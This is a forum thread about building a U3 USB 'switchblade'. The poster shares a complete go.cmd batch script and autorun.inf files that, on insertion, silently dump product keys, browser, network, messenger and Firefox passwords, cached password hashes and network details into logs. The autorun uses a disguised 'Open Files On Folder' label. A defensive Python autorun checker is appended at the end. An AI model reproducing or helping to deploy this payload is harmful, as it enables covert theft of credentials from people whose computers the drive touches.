
Saving the .txt logs?


ickleangel


Hey guys and girls,

i have successfully installed my custom package onto my U3 drive, but when it runs i get this error,

Error 5: Access is denied.

is this because of the way the go.cmd is set up?

WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_pk.log" >nul

or am i totally missing something?

i installed my custom payload from the .iso created using the 'Universal_Customizer' suite,

please guys, really need some help with this one, just doesn't want to be nice,

i was thinking maybe its due to the way it tries to write the data to the CDROM part of the U3 drive?

how would i change this in the go.cmd or do i need to do something completely different?

here is the complete entry from my go.cmd in the /WIP/CMD folder in the .iso

@echo off

if not exist WIPdump md WIPdump >nul

if not exist WIPdump%computername% md WIPdump%computername% >nul

cd WIPCMD >nul

.nircmd.exe execmd CALL WIPCMDWIRELESS.BAT

.nircmd.exe execmd CALL WIPCMDDIR.BAT



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo ***********[System info]************ >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> WIPdump%computername%%computername%.log 2>&1

ipconfig /all >> WIPdump%computername%%computername%.log 2>&1



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump Product Keys]****** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .produkey /nosavereg /stext "WIPdump%computername%%computername%_pk.log" /remote %computername% >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_pk.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_pk.log" >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump IE7 secrets]******* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .iepv.exe /stext "WIPdump%computername%%computername%_ie7.log" >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ie7.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_ie7.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%-updateslist.log 2>&1

echo ***********[Dump updates-list]******* >> WIPdump%computername%%computername%-updateslist.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%-updateslist.log 2>&1

   .wul.exe /stext "WIPdump%computername%%computername%_LSA.log" >> WIPdump%computername%%computername%-updateslist.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_lsa.log* WIPdump%computername%%computername%-updateslist.log  >> nul

   del /f /q "WIPdump%computername%%computername%_lsa.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump Network PW]******** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .netpass.exe /stext "WIPdump%computername%%computername%_np.log" >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_np.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_np.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ************[Dump Cache PW]********* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.cachedump.exe >> WIPdump%computername%%computername%.log 2>&1



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Network Services]******* >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

netstat.exe -abn >> WIPdump%computername%%computername%.log 2>&1



Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

echo ***********[Dump messenger PW]******** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

   .mspass.exe /stext "WIPdump%computername%%computername%_ms.log" >> WIPdump%computername%%computername%.log 2>&1

   copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ms.log* WIPdump%computername%%computername%.log  >> nul

   del /f /q "WIPdump%computername%%computername%_ms.log" >nul



Echo ************************************ >> WIPdump%computername%%computername%-ie.log 2>&1

echo ***********[Dump URL History]******* >> WIPdump%computername%%computername%-ie.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%-ie.log 2>&1

   .iehv.exe /stext "WIPdump%computername%%computername%_ie.log" >> WIPdump%computername%%computername%-ie.log 2>&1



set RtD=%CD%

cd /D "%appdata%MozillaFirefoxProfiles" >nul

set PROFILE=

for /D %%i in (*) do set PROFILE=%%i

cd /D %RtD% >nul

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

Echo *********[Dump Firefox PW]********** >> WIPdump%computername%%computername%.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%.log 2>&1

.FirePassword.exe "%appdata%MozillaFirefoxProfiles%PROFILE%" >> WIPdump%computername%%computername%.log



cd WIPdump%computername% >nul

Echo ************************************ > WIPdump%computername%%computername%port.log 2>&1

echo ************[Port Scan]************* >> WIPdump%computername%%computername%port.log 2>&1

Echo ************************************ >> WIPdump%computername%%computername%port.log 2>&1

cd 

WIPCMDportqry -local -l WIPdump%computername%%computername%_ports.log>>nul

copy WIPdump%computername%%computername%.log+WIPdump%computername%%computername%_ports.log >>nul

del /f /q "WIPdump%computername%%computername%_ports.log" >nul

cd WIPCMD >nul

here is an upload of my original NON-U3 switchblade,

http://rapidshare.com/files/13264612/ike-hacktools.rar

the above is exactly what i put in my .iso and used ISOCreate.cmd with all the tools, from WIPCMD

All help greatly appreciated,

Thanks,

ike,


It just means one of the tools can't run, or it has no access to write the logs. Check if ur running the payload from an administrator account, and also make sure that ur USB key isn't set to read-only.

its definitely an admin account, cos its my own one lol

how do i check if the USB is set to read only?

thanks,

ike,


The programs/logs/files/you get the point will go on the FLASH partition of the drive. The only thing on the CD partition is the autorun.inf and other files U3 needs to run

i thought it was that, but i was too tired to try it,

so it should go like this:

[CDFS]

Autorun.inf

U3 Launcher.exe (from original U3 file?)

[FLASH]

/WIP/CMD

/WIP/DUMP

etc?

My current Autorun.inf -

[autorun] 

action=Open Files On Folder

icon=iconsike.ico

shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd

does this need to be modified to point to anywhere on the flash partition, or is it fine as it is?

sorry for the noob questions, i just wanna make sure i dont destroy my drive,

Thanks for your help so far,

ike,


ok, so im super confused now,

any chance you could write me up a complete idiot sheet? as i thought i needed to install an autorun.inf to the CDFS partition to point to the flash partition and the files to run them, or am i mistaken?

sorry for taking up so much of your time on this, i really appreciate it, just want to get it working on my U3 drive as that works better so i have been led to believe,

thanks again,

ike,


Ok... heres the cheat sheet

On your cd partition:

*** All of these are already on the CD partition, or should be ***

autorun.inf

Launchpad.zip

LaunchU3.exe

*** All of these are already on the FLASH partition, or should be ***

/Documents

/System

LaunchU3.exe

**** /What ever else you want goes on the flash partition UNLESS you used the ISO****

Hope this helps

--ShadowHax


  • 2 weeks later...

Hi, sorry not replied, been painting my laptop...

if i understand correctly,

the autorun.inf on the CD is the original one,

the autorun.inf in the flash is the modified one pointing to go.cmd

so in the CD i now have,

original U3 stuff,

Documents Folder,

Launchpad Folder,

LaunchU3.exe

Autorun.inf

the contents of the autorun on the CD partition

[AutoRun] 

open=LaunchU3.exe

icon=LaunchU3.exe,0 



[Definitions]

Launchpad=LaunchPad.exe



[CopyFiles]

FileNumber=1

File1=LaunchPad.zip

on the flash i now have,

Documents Folder (original u3)

Launchpad Folder (original u3)

launchu3.exe

launchpad.zip

i have also added these for my switchblade,

WIP Folder containing 'tools' (wipcmdgo.cmd)

Icons (containing custom icons)

nircmd.exe (needed to run wipcmdgo.cmd????)

and my Custom Autorun.inf

the contents of the autorun.inf on my flash

[autorun] 

action=Open Files On Folder

icon=iconsdrive.ico

shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd

sorry to keep pestering you about this,

thanks for all your help so far,

ike,
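
For anyone auditing removable media, the two autorun.inf files quoted in this thread differ in ways a simple check can key on. The following is an added example, not part of any post above and not code from U3 or the tools discussed; `parse_autorun`, `audit_autorun`, the single-entry allowlist and the finding labels are assumptions made for illustration, and the sample inputs are copied as they appear on this page.

```python
import re

EXEC_KEYS = {"open", "shellexecute"}      # [autorun] keys that start a program
EXPECTED_TARGETS = {"launchu3.exe"}       # assumption: stock U3 launcher only
SCRIPT_HINT = re.compile(r"\.(cmd|bat|vbs|js)\b|\bcall\b", re.I)
FOLDER_LURE = re.compile(r"\bopen\b.*\b(folder|files)\b", re.I)

# Sample inputs copied from the two autorun.inf files quoted in this thread.
STOCK_U3 = """[AutoRun]
open=LaunchU3.exe
icon=LaunchU3.exe,0
[Definitions]
Launchpad=LaunchPad.exe
[CopyFiles]
FileNumber=1
File1=LaunchPad.zip
"""
MODIFIED = """[autorun]
action=Open Files On Folder
icon=iconsdrive.ico
shellexecute=nircmd.exe execmd CALL WIPCMDgo.cmd
"""

def parse_autorun(text):
    """Return the [autorun] section as a dict with lower-cased keys."""
    section, entries = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
        elif section == "autorun" and "=" in line and not line.startswith(";"):
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries

def audit_autorun(text):
    """Return finding strings for one autorun.inf body (empty list = clean)."""
    entries, findings = parse_autorun(text), []
    for key, value in entries.items():
        if key in EXEC_KEYS or (key.startswith("shell\\") and key.endswith("\\command")):
            target = value.split()[0].strip('"').lower() if value else ""
            if target not in EXPECTED_TARGETS:
                findings.append(f"unexpected-launch:{key}={value}")
            if SCRIPT_HINT.search(value):
                findings.append(f"script-chain:{key}")
    launches = any(f.startswith("unexpected-launch") for f in findings)
    if launches and FOLDER_LURE.search(entries.get("action", "")):
        findings.append("folder-lure-action")  # label imitates Explorer's prompt
    return findings
```

The stock file produces no findings; the modified one is flagged for an unexpected launch target, a script chained behind it, and an `action=` label worded like Explorer's own open-folder choice.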
